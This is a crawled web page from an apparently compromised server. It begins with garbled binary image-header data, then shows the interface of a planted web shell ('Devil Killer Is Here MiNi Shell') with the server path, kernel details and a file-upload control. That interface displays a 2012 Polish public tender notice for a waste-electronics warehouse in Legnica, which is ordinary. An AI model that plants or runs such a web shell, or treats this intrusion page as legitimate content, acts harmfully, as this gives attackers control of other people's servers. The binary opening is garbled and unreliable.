JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120405/108328-N-2012.html

<p class="kh_header"><b>Legnica: Budowa magazynu wielofunkcyjnego do składowania zużytego sprzętu RTV, wraz z przyłączami: wody, kanalizacji sanitarnej i deszczowej  -  TP/TIM/3/2012</b><br>
<b>Numer ogłoszenia: 108328 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Nowodworska 60, 59-220 Legnica, woj. dolnośląskie, tel. 76 8566350 w. 103, faks 76 7233763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lpgk.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa magazynu wielofunkcyjnego do składowania zużytego sprzętu RTV, wraz z przyłączami: wody, kanalizacji sanitarnej i deszczowej  -  TP/TIM/3/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa magazynu wielofunkcyjnego do składowania zużytego sprzętu RTV, wraz z przyłączami: wody, kanalizacji sanitarnej i deszczowej.
Lokalizacja obiektu:  59-220 Legnica ul. Rzeszotarska dz. nr 66-1 obr. Rybaki.
Termin wykonania zamówienia:  do 30.09.2012r.
Roboty budowlano-montażowe:
Roboty ziemne,
Roboty fundamentowe,
Roboty betoniarskie,
Roboty murarskie,
Roboty montażu konstrukcji stalowych,
Roboty dekarskie,
Stolarka okienna i drzwiowa,
Roboty posadzkowe,
Roboty tynkarskie,
Roboty malarskie,
Roboty zewnętrzne,
Roboty elewacyjne.
Instalacje sanitarne, przyłącza:
Przyłącze wodociągowe,
Przyłącze kanalizacji sanitarnej,
Przyłącze kanalizacji deszczowej.

Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja techniczna - Załącznik nr 2 do SIWZ:
- Szczegółowa Specyfikacja Techniczna - wykonania i odbioru robót 		wykonana przez Zakład Usług Technicznych w Budownictwie - Zbigniew 		Śniady, październik 2010r. (w formacie .pdf),
- Projekt architektoniczno-budowlany wykonany przez Przedsiębiorstwo 		Projektowo-Usługowe BISPROL Sp. z o.o., 2008r. (w formacie .pdf),
- Projekt zagospodarowania terenu dla inwestycji - budowa magazynu wraz z 	przyłączami, sierpień 2009r. (w formacie .pdf),
- Przedmiar robót - roboty budowlano-montażowe, wykonany przez Zakład 		Usług Technicznych w Budownictwie - Zbigniew Śniady, wrzesień 2010r. (w 		formacie .ath)
- Przedmiar robót - przyłącza wodociągowe, kanalizacji sanitarnej, 			kanalizacja deszczowa, wykonany przez Zakład Usług Technicznych w 			Budownictwie - Zbigniew Śniady, wrzesień 2010r. (w formacie .ath),
- Decyzja Prezydenta Miasta Legnicy Nr 594-2010 z dnia 14.10.2010r. - 		zatwierdzenie projektu budowlanego oraz udzielenie pozwolenia na budowę 		na rzecz LPGK sp. z o.o. dla inwestycji polegającej na: budowie magazynu 		wielofunkcyjnego do składowania zużytego sprzętu RTV, wraz z przyłączami: 		wody, kanalizacji sanitarnej, energii elektrycznej; przewidzianej do realizacji 		na terenie działki nr 66-1, obręb Rzeszotary w Legnicy przy ul. 				Rzeszotarskiej, kategoria obiektu nr XVIII.

UWAGA !!!
Rozbiórkę istniejącego budynku oraz instalacje elektryczne Zamawiający wykona we własnym zakresie.

> Całość prac należy wykonać zgodnie z projektem architektoniczno-budowlanym i specyfikacjami technicznymi wykonania i odbioru robót.
> Jeżeli w opisie przedmiotu zamówienia (m.in. w dokumentacji technicznej) wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych niż zaproponowane przez Zamawiającego.
> Koszt i inne obce usługi oraz udziały w odbiorach itp. Wykonawca winien uwzględnić w kosztach ogólnych.
> Przed złożeniem oferty, Wykonawca winien dokonać wizji lokalnej terenu, na którym będzie realizowany przedmiot zamówienia. W tym celu należy o planowanej wizycie powiadomić z jednodniowym wyprzedzeniem wysyłając faxem powiadomienie na nr 76 856 63 55 i zgłosić się w biurze Składowiska Odpadów Komunalnych przy ul. Rzeszotarskiej u P. Tomasza Lewandowskiego - Z-cy Kierownika ZOM. Wszelkie koszty związane z dokonaniem wizji lokalnej ponosi Wykonawca.
Wykonawca winien zebrać informacje niezbędne do właściwej kalkulacji wynagrodzenia za wykonanie przedmiotu  zamówienia oraz właściwego zaplanowania i organizacji wykonania przedmiotu zamówienia.
> Zabezpieczenie i oznakowanie placu budowy Wykonawca uwzględni w kosztach ogólnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości 50%wartości zamówienia podstawowego odpowiadających zakresem oraz przedmiotem zamówienia zamówieniu podstawowemu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-8, 45.20.00.00-9, 45.21.00.00-2, 45.21.32.21-8, 45.23.00.00-8, 45.23.13.00-8, 45.23.21.30-2, 45.11.12.00-0, 45.22.35.00-1, 45.22.31.00-7, 45.44.22.00-9, 45.26.26.20-3, 45.42.10.00-4, 45.44.21.00-8, 45.45.00.00-6, 45.26.21.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 11.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów: 
- Oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt. 1-4 uPzp wg Załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz 3 robót budowlanych odpowiadających swoim rodzajem przedmiotowi zamówienia, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów:
- Wykaz robót wg Załącznika nr 7 do SIWZ
- Dokumenty potwierdzające należyte wykonanie robót</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów: 
- Oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt. 1-4 uPzp wg Załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
a). Kierownik budowy posiadający uprawnienia budowlane o specjalności konstrukcyjno-budowlanej bez ograniczeń oraz legitymujący się przynależnością do PIIB (Osoba winna być ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji)
b). Kierownik robót sanitarnych posiadający uprawnienia dla branży sanitarnej oraz legitymujący się przynależnością do PIIB. (Osoba winna być ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji)
Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów:
- Wykaz osób wg Załącznika nr 11 do SIWZ
- Oświadczenie, że wskazane w Załączniku nr 11 do SIWZ osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają stosowne uprawnienia oraz oświadczenie, że są wpisane na listę PIIB oraz ubezpieczone od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a). Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej - 600.000,00 zł
Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów:
- Opłacona polisa

b). Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert na kwotę min. 600.000,00 zł
Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów:
- Informacja banku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	druk FORMULARZ OFERTOWY według Załącznika nr 3 do SIWZ

2.	druk OPIS PRZEDMIOTU ZAMÓWIENIA według Załącznika nr 1 do SIWZ 

3.	KOSZTORYS OFERTOWY sporządzony na podstawie udostępnionych w Załączniku nr 2 do SIWZ przedmiarów robót

4.	Dokumenty upoważniające osobę(osoby) podpisującą(e) ofertę do reprezentacji Wykonawcy (np.: wypis z KRS lub EDG) oraz PEŁNOMOCNICTWO w przypadku określonym w art. 23 uPzp lub gdy Wykonawca jest reprezentowany przez inną osobę w zakresie określonym w pełnomocnictwie. 

5.	oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust.1 pkt. 1-4 Pzp według Załącznika nr 4 do SIWZ

Oświadczenie winni złożyć wszyscy Wykonawcy występujący wspólnie o udzielenie zamówienia

6.	druk WYKAZ CZĘŚCI ZAMÓWIENIA, KTÓRYCH WYKONANIE ZOSTANIE POWIERZONE PODWYKONAWCOM według Załącznika nr 8 do SIWZ

7.	druk DOŚWIADCZENIE ZAWODOWE według Załącznika nr 7 do SIWZ
- dokumenty potwierdzające należyte wykonanie robót

8.	oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 Pzp, według Załącznika nr 5 do SIWZ
Oświadczenie winni złożyć w zależności od osobowości prawnej Wykonawcy: osoby fizyczne, wspólnicy spółki (wszyscy), członkowie zarządu spółki (wszyscy), partnerzy spółki (wszyscy), komplementariusze spółki (wszyscy), dotyczy to również wykonawców ubiegających się wspólnie o udzielenie zamówienia.

9.	aktualny odpis z właściwego rejestru, a w stosunku do osób fizycznych oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 2 Pzp, według Załącznika nr 13 do SIWZ

W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot.

10.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 	pkt 4-8 ustawy
W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot.

11.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 	pkt 9

12.	druk OŚWIADCZENIE O DOKONANIU WIZJI LOKALNEJ według Załącznika nr 9 do SIWZ

13.	wypełniony i zaparafowany PROJEKT UMOWY według Załącznika nr 6 do SIWZ
	
14.	dowód wpłaty wadium (dołączony do  FORMULARZA OFERTOWEGO)

15.	druk GWARANCJA JAKOŚCI według Załącznika nr 10 do SIWZ

16.	druk WYKAZ OSÓB, KTÓRYMI (BĘDZIE)DYSPONUJE WYKONAWCA według Załącznika nr 11 do SIWZ

17.	druk HARMONOGRAM RZECZOWO-FINANSOWY według Załącznika nr 12 do SIWZ

18.	opłacona POLISA lub inny dokument ubezpieczeniowy 

19.	INFORMACJA BANKU/spółdzielczej kasy oszczędnościowo-kredytowej o wysokości posiadanych środków finansowych lub zdolności kredytowej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości dokonania zmian w umowie:
3.1. zmiana terminu wykonania umowy
- przypadki losowe, wystąpienie tzw. siły wyższej (np.: kataklizmy, niemożliwe do 	przewidzenia wydarzenia, itp.), które uniemożliwiają realizację oraz terminowe wykonanie 	zamówienia publicznego;
- ograniczenie zakresu robót wynikających z braku środków finansowych;
- wprowadzenie koniecznych zmian w rozumieniu Prawa budowlanego w dokumentacji 	projektowej, wpływających na zakres robót koniecznych do wykonania;
- konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.;
- sytuacje wyjątkowe, niemożliwe wcześniej do przewidzenia przez Zamawiającego;
- wystąpienie robot dodatkowych, niemożliwych do przewidzenia przed zawarciem umowy;
3.2. zmiana zakresu robót
- ograniczenie zakresu robót wynikających z braku środków finansowych;
- konieczność wykonania robót zamiennych;
- wykonanie prac wynikających z zaleceń organów uprawnionych np.: Nadzoru Budowlanego, 	PIP itp.;
- wprowadzenie koniecznych zmian w rozumieniu Prawa budowlanego w dokumentacji 	projektowej, wpływających na zakres robót koniecznych do wykonania;
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
3.3. zmiana wartości zamówienia
- w przypadku braku środków finansowych lub pozyskaniem dodatkowych, może nastąpić 	zwiększenie lub zmniejszenie zakresu rzeczowo-finansowego, czego Zamawiający nie mógł 	przewidzieć przy 	zawieraniu umowy;
- zwiększenie lub zmniejszenie ilości robót wynikające z rzeczywistych obmiarów przy 	rozliczeniu końcowym;
- wprowadzenie koniecznych zmian w rozumieniu Prawa budowlanego w dokumentacji 	projektowej, wpływających na zwiększenie/zmniejszenie zakresu robót koniecznych do 	wykonania;
- konieczność wykonania robót zamiennych;
3.4. inne
- w wypadku zmian podmiotowych po stronie Wykonawcy, zgodnie z obowiązującymi przepisami 	prawa;
- zmiana Inspektora Nadzoru, Kierownika Budowy, Kierownika Robót;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lpgk.legnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.
ul. Nowodworska 60
59-220 Legnica
Dział Rozwoju Przygotowania i Rozliczania Produkcji - pok. 2 (parter).</p>
